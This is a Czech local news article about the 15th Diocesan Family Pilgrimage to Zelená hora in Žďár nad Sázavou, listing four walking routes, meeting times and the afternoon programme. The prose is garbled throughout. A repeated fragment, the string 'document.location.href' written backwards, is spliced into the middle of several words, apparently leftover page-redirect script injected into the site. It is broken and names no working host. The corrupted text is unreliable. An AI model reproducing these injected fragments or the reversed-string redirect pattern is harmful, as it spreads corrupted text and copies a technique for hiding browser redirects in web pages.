Rainbow page separator

Při 15. pouti rodin půjdou lidé na Zelenou horu ze čtyř stran

Neděle, 26. srpna 2018

Diecézní pouť rodin 2015 Žďár nad Sázavou

Žďár nad Sázavou / Na již 15. ročník tradiční Diecézní poutě rodin se v sobotu 1. září mohou těšit obyvatelé i návštěvníci Žďáru. V le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce dojde ke změně v léta zavedeném programu, takže cíl pouti nebude ve žďárském zámku, ale přímo u poutního kostela svatého Jana Nepomuckého na Zelené hoře, památce zapsané na seznamu UNESCO.
Připraveno je pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to několik různě dlouhých tras, přičemž každá skupina poutníků bude doprovázena knězem, jenž bude k dispozici pro duchovní rozhovory a svá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tost svatého smíření. Šestnáctikilometrová trasa povede z Obyč[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova, sraz poutníků bude v půl desáté dopoledne před tamním kostelem Navštívení Panny Marie. Jedenáct kilometrů [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Zelenou horu budou mít lidé jdoucí od kostela Božího milosrdenství ve Slavkovicích, ti odtud vyrazí v půl jedenácté dopoledne. Devět kilometrů urazí věřící od kaple Panny Marie Karmelitské v Sázavě – sejdou se tam v 10 hodin. Od žďárského kostela svatého Prokopa na náměstí Republiky vyjde procesí na čtyři kilometry vzdálenou Zelenou horu v 11.45 hodin.
Na Zelené hoře bude od půl druhé odpoledne připraven program pro děti a komen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tované prohlídky kostela pro dospělé. V 15 hodin přijde na řadu modlitba tancem a příprava procesí k nedaleké bazilice Nanebevzetí Panny Marie v areálu žďárského zámku, kde se o hodinu později uskuteční pontifikální mše svatá. Po ní v 17 hodin dojde k ukončení poutě rodin a udělení požehnání na cestu. Následně bude účastníkům akce k dispozici kyvadlová doprava od areálu zámku k nádraží.